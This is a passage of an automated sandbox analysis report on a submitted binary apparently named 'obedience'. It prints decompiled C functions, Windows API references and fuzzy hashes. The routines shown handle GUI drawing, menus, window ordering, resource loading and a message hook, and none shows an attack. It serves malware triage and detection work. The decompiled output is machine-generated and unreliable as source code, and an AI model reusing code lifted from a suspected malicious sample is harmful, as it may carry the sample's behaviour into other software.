      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: InfoLocaleStringThreadType
      • String ID:
      • API String ID: 1505017576-0
      • Opcode ID: 9643e280fb3d119fd4ba62e4d82edf06eba3b03041eae01f82019c790613f910
      • Instruction ID: 022c4badb116a001143af62e3785d81e0892c8282bb3ca0fc826b292eeaf275d
      • Opcode Fuzzy Hash: 9643e280fb3d119fd4ba62e4d82edf06eba3b03041eae01f82019c790613f910
      • Instruction Fuzzy Hash: 0231D561D442548FD720D7E5AC017A6379AEB61364F4480BBE488AB3D2DB7C684CCB5E
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00470604 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
      Download Yara Rule
      C-Code - Quality: 80%
      			E00470604(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v44;
				struct HDC__* _t39;
				void* _t67;
				intOrPtr _t87;
				void* _t89;
				void* _t91;
				intOrPtr _t92;

				_t89 = _t91;
				_t92 = _t91 + 0xffffffd8;
				_v12 = __edx;
				_v8 = __eax;
				_t69 = E00430DA8();
				if(E00430EB0(_t32) == 0 ||  *(_v8 + 0x16c) <= 0) {
					return E0044BFB0(_v8, _v12);
				} else {
					_t39 = E0044B158(_v8);
					L00407768();
					_v16 = _t39;
					 *[fs:edx] = _t92;
					 *((intOrPtr*)( *_v8 + 0x44))( *[fs:edx], 0x4706fa, _t89, _t39);
					E00406E24( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					ExcludeClipRect(_v16, _v32, _v28, _v24, _v20);
					SetWindowOrgEx(_v16,  ~( *(_v8 + 0x16c)),  ~( *(_v8 + 0x16c)), 0);
					E00431054( &_v44, 0x2b);
					E00430FB0(_t69, _v16, E0044B158(_v8), 0, 0,  &_v44);
					_pop(_t87);
					 *[fs:eax] = _t87;
					_push(0x470701);
					_push(_v16);
					_t67 = E0044B158(_v8);
					_push(_t67);
					L004078C0();
					return _t67;
				}
			}

















      0x00470605
      0x00470607
      0x0047060b
      0x0047060e
      0x00470616
      0x00470621
      0x0047071a
      0x00470637
      0x0047063a
      0x00470640
      0x00470645
      0x00470653
      0x0047065e
      0x00470671
      0x0047068a
      0x004706ad
      0x004706b9
      0x004706d5
      0x004706dc
      0x004706df
      0x004706e2
      0x004706ea
      0x004706ee
      0x004706f3
      0x004706f4
      0x004706f9
      0x004706f9

      APIs
      • 73BEB080.USER32(00000000), ref: 00470640
      • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000), ref: 0047068A
      • SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004706AD
      • 73BEB380.USER32(00000000,?,00470701,00000000,?,?,?,?,?,?,00000000), ref: 004706F4
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B080B380ClipExcludeRectWindow
      • String ID:
      • API String ID: 3245360159-0
      • Opcode ID: c56d43a01187abd7442fea925066739881520e030ecbb9362dd632b2860c0460
      • Instruction ID: cb319c9865a6b6c9c41e6cad574d07b30161efc8d19b111ead2b3264d56a2707
      • Opcode Fuzzy Hash: c56d43a01187abd7442fea925066739881520e030ecbb9362dd632b2860c0460
      • Instruction Fuzzy Hash: A8310075E04208EFDB00EBA9C991EEEB7F9EB49304F1085A6F505E7341D639AE058B54
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00429D84 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
      Download Yara Rule
      C-Code - Quality: 64%
      			E00429D84(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E0042674C(_v8);
					_push(_t84);
					_push(0x429e63);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E0042B0A8( *((intOrPtr*)(_v8 + 0x58)));
					E00429C00( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E0042B1A8( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L00407280();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L00407420();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L004073F0();
					}
					E00426B80(_v8, _t66);
					_t58 =  *0x48e77c; // 0x2480acc
					E00419FE4(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x429e6a);
					return E004269F8(_v8);
				}
			}



















      0x00429d85
      0x00429d87
      0x00429d8a
      0x00429d8d
      0x00429d94
      0x00429e6e
      0x00429d9a
      0x00429d9d
      0x00429da4
      0x00429da5
      0x00429daa
      0x00429dad
      0x00429db6
      0x00429dc7
      0x00429dd2
      0x00429dd7
      0x00429dd9
      0x00429dde
      0x00429de9
      0x00429dee
      0x00429e04
      0x00429df0
      0x00429dfa
      0x00429dfa
      0x00429e0d
      0x00429e10
      0x00429e15
      0x00429e33
      0x00429e17
      0x00429e17
      0x00429e19
      0x00429e1a
      0x00429e1b
      0x00429e23
      0x00429e26
      0x00429e27
      0x00429e27
      0x00429e3b
      0x00429e43
      0x00429e48
      0x00429e4f
      0x00429e52
      0x00429e55
      0x00429e62
      0x00429e62

      APIs
        • Part of subcall function 0042674C: RtlEnterCriticalSection.KERNEL32(004908C4,00000000,004251BE,00000000,0042521D), ref: 00426754
        • Part of subcall function 0042674C: RtlLeaveCriticalSection.KERNEL32(004908C4,004908C4,00000000,004251BE,00000000,0042521D), ref: 00426761
        • Part of subcall function 0042674C: RtlEnterCriticalSection.KERNEL32(00000038,004908C4,004908C4,00000000,004251BE,00000000,0042521D), ref: 0042676A
        • Part of subcall function 0042B1A8: 73BEAC50.USER32(00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B1FE
        • Part of subcall function 0042B1A8: 73BEAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B213
        • Part of subcall function 0042B1A8: 73BEAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B21D
        • Part of subcall function 0042B1A8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B241
        • Part of subcall function 0042B1A8: 73BEB380.USER32(00000000,00000000,00000000,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042B24C
      • 73BEA590.GDI32(00000000,00000000,00429E63), ref: 00429DD9
      • SelectObject.GDI32(00000000,?), ref: 00429DF2
      • 73BEB410.GDI32(00000000,?,000000FF,00000000,00000000,00429E63), ref: 00429E1B
      • 73BEB150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00429E63), ref: 00429E27
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
      • String ID:
      • API String ID: 2198039625-0
      • Opcode ID: 52627fab76bdb2200c5a2abc028d6a13087f29d4b66bad55b1ab170e390471a5
      • Instruction ID: e556636ed477f303664a25b8528dc576f5d8a5c54a15585e020bf312f5ea4973
      • Opcode Fuzzy Hash: 52627fab76bdb2200c5a2abc028d6a13087f29d4b66bad55b1ab170e390471a5
      • Instruction Fuzzy Hash: B1312B34B04624EFC704DB59D981D4EB3F5EF48714B6241AAF804AB362C734EE41DB84
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004586A4 Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E004586A4(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E00457D80(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E00457BFC(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E00457BFC(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00409B08(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00409A44(_a12, _t49);
				}
			}










      0x004586ab
      0x004586ad
      0x004586af
      0x004586ba
      0x00000000
      0x0045873e
      0x004586be
      0x004586ce
      0x004586eb
      0x004586f0
      0x004586f5
      0x00458702
      0x00458702
      0x004586d0
      0x004586d7
      0x004586e4
      0x004586e4
      0x00458709
      0x00000000
      0x0045870b
      0x0045870e
      0x0045871d
      0x00000000
      0x00458725

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$ItemStateString
      • String ID:
      • API String ID: 306270399-0
      • Opcode ID: 958d28d622fcaabf2a5ae7125b84a55d10eeee537db7687794ce280936756176
      • Instruction ID: 999ae4a9b69dfb80c2ec330b75b30dde3c01bbf258ae47979e45758134e61beb
      • Opcode Fuzzy Hash: 958d28d622fcaabf2a5ae7125b84a55d10eeee537db7687794ce280936756176
      • Instruction Fuzzy Hash: 32117F31605104AFC700EE6D9C859AF77E8AF493A5B20443FFC09E7392DA38ED059769
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00463530 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00463530(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				void* _t28;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t28 = __ecx;
				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x490b7c; // 0x2481268
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E004634C0, _t37);
						_t17 =  *(_t27 + 0x90);
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t17 =  *(_t27 + 0x90);
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t17 = SetWindowPos(E00419C84( *(_t27 + 0x90), _t28, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}












      0x00463530
      0x00463532
      0x00463535
      0x00463537
      0x00463540
      0x0046354d
      0x00463556
      0x00463559
      0x00463565
      0x0046356a
      0x00463574
      0x00463582
      0x00463584
      0x00463591
      0x00463593
      0x00463593
      0x0046359a
      0x004635a3
      0x004635a7
      0x004635a9
      0x004635c9
      0x004635ce
      0x004635cf
      0x004635a9
      0x004635a7
      0x00463574
      0x004635d4
      0x004635d4
      0x004635de

      APIs
      • EnumWindows.USER32(004634C0), ref: 00463565
      • GetWindow.USER32(00000003,00000003), ref: 0046357D
      • GetWindowLongA.USER32 ref: 0046358A
      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 004635C9
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$EnumLongWindows
      • String ID:
      • API String ID: 4191631535-0
      • Opcode ID: e8a1f66ca9543963858cbe399f1bdc0b8d48c36e9c6e804f18515e8b11975d2e
      • Instruction ID: 34ec1e0ab4b7ee6e973036d34b1632b8c977f34ba61956058d1254a6f56eae3d
      • Opcode Fuzzy Hash: e8a1f66ca9543963858cbe399f1bdc0b8d48c36e9c6e804f18515e8b11975d2e
      • Instruction Fuzzy Hash: 98117370608250AFD710EF2CCC85F96B3D4EB04729F15027AF958AB2D2D778AD40C75A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041CBBC Relevance: 6.1, APIs: 4, Instructions: 51COMMON
      Download Yara Rule
      C-Code - Quality: 82%
      			E0041CBBC(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E0041CB4C(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x41cc60
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0041CB4C(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x41cc60
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x41c8c8
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E0041C888(_t23, _t25, _t18);
			}

















      0x0041cbc3
      0x0041cbc6
      0x0041cbc8
      0x0041cbd8
      0x0041cbda
      0x0041cbdd
      0x0041cbdf
      0x0041cbe2
      0x0041cbe7
      0x0041cbe7
      0x0041cbe8
      0x0041cbf2
      0x0041cbf4
      0x0041cbf7
      0x0041cbf9
      0x0041cbfc
      0x0041cc01
      0x0041cc02
      0x0041cc0c
      0x0041cc0d
      0x0041cc11
      0x0041cc1a
      0x0041cc25

      APIs
      • FindResourceA.KERNEL32(?,?,?), ref: 0041CBD3
      • LoadResource.KERNEL32(?,0041CC60,?,?,?,00417DE0,?,00000001,00000000,?,0041CADC,?), ref: 0041CBED
      • SizeofResource.KERNEL32(?,0041CC60,?,0041CC60,?,?,?,00417DE0,?,00000001,00000000,?,0041CADC,?), ref: 0041CC07
      • LockResource.KERNEL32(0041C8C8,00000000,?,0041CC60,?,0041CC60,?,?,?,00417DE0,?,00000001,00000000,?,0041CADC,?), ref: 0041CC11
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Resource$FindLoadLockSizeof
      • String ID:
      • API String ID: 3473537107-0
      • Opcode ID: c14ff8e6fa6f6f6645f93693a961653f50a190c8eef64b752231028638aa4508
      • Instruction ID: 9796dd7fd95931b729d06b7b52947e8421ad4d8ab94d6448901d75e807912902
      • Opcode Fuzzy Hash: c14ff8e6fa6f6f6645f93693a961653f50a190c8eef64b752231028638aa4508
      • Instruction Fuzzy Hash: A2F06DB26482046F9704EE6DAC82D9B77DCDE89364310016FF908DB346DA39ED4143B9
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00442678 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
      Download Yara Rule
      C-Code - Quality: 87%
      			E00442678(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x490aec; // 0x2480dd0
					if(GlobalFindAtomA(E00404F00(_t9)) !=  *0x490ae8) {
						_t16 = 0 | E004417B8(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x490ae8 & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







      0x00442678
      0x0044267a
      0x0044267b
      0x0044267d
      0x00442681
      0x00442698
      0x004426af
      0x004426cf
      0x004426b1
      0x004426c1
      0x004426c1
      0x004426af
      0x004426d7

      APIs
      • GetWindowThreadProcessId.USER32(00000000), ref: 00442685
      • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,004426F0,004424B2,00490B20,00000000,004422A2,?,-0000000C,?), ref: 0044268E
      • GlobalFindAtomA.KERNEL32(00000000), ref: 004426A3
      • GetPropA.USER32 ref: 004426BA
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
      • String ID:
      • API String ID: 2582817389-0
      • Opcode ID: 387dd020038ca6b7a403543475f0ada9f2241b0da58cf1419fdd78323efc1424
      • Instruction ID: 349a37b6f0d2aadfd1de078f283ef8f65be3a40d50ae6cb3781f493f57cda11d
      • Opcode Fuzzy Hash: 387dd020038ca6b7a403543475f0ada9f2241b0da58cf1419fdd78323efc1424
      • Instruction Fuzzy Hash: 5BF0E57261A2255BBB1177B76E41A7F118C9D60364381413FF800E6296DE2CDCD182BF
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004417EC Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
      Download Yara Rule
      C-Code - Quality: 87%
      			E004417EC(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x490af0; // 0x2480dec
					if(GlobalFindAtomA(E00404F00(_t5)) !=  *0x490aea) {
						_t15 = E004417B8(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x490aea & 0x0000ffff);
					}
				}
				return _t15;
			}







      0x004417ec
      0x004417ee
      0x004417ef
      0x004417f1
      0x004417f5
      0x0044180c
      0x00441823
      0x0044183e
      0x00441825
      0x00441833
      0x00441833
      0x00441823
      0x00441845

      APIs
      • GetWindowThreadProcessId.USER32(00000000), ref: 004417F9
      • GetCurrentProcessId.KERNEL32(?,?,00000000,004642DF,?,?,?,00000001,0046444B,?,?,?,?), ref: 00441802
      • GlobalFindAtomA.KERNEL32(00000000), ref: 00441817
      • GetPropA.USER32 ref: 0044182E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
      • String ID:
      • API String ID: 2582817389-0
      • Opcode ID: 1d459b63cf46a2fd0c7c1b090ccc389f970030f4000cafa30075405610327087
      • Instruction ID: 7e399faec5378e9c9ba2174e6606955be3c26f48c0a4cef2339024d059ae8ea4
      • Opcode Fuzzy Hash: 1d459b63cf46a2fd0c7c1b090ccc389f970030f4000cafa30075405610327087
      • Instruction Fuzzy Hash: E7F06561A142116EEB2077B65C82D6B15CC89653E4340053BF901E7363ED3CEC8183FE
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00462E2C Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00462E2C(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x490b7c; // 0x2481268
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x490b94 == 0) {
						_t2 = SetWindowsHookExA(3, E00462DE8, 0, GetCurrentThreadId());
						 *0x490b94 = _t2;
					}
					if( *0x490b90 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x490b90 = _t2;
					}
					if( *0x490b98 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00462D8C, 0, 0, _t7);
